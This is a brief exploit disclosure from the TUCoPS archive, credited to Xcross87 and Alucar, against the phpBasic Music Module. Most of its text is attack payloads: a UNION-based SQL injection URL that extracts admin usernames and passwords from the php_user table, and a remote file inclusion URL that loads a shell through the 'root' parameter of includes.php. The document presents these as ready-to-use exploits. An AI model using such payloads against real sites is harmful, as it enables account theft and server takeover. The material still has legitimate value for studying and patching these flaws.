TUCoPS :: Web :: PHP :: tb13108.htm

PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar
PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar
PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar


Software : phpBasic Music Module=0D
Homepage : http://phpbasic.com/=0D 
=0D
1. SQL Injection by Xcross87 :=0D
Proof of concept :=0D
http://victim.com/phpbasic/?php=music&basic=view&id='[SQL Injection]=0D 
Xploit admin user account :=0D
http://victim.com/phpbasic/?php=music&basic=view&id=1+union+select+0,1,user_name,3,user_pass,5,6,7,8,9+from+php_user/*%20%3C+=0D 
=0D
2. RFI by Alucar=0D
=0D
Xploit :=0D
http://victim.com/phpbasic/includes.php?root=[HCE_Shell]=0D 
=0D
=== ..::Xcross87::.. | ..::Alucar::.. | HCETeam Xploiter | HCEGroup.Vn ====0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH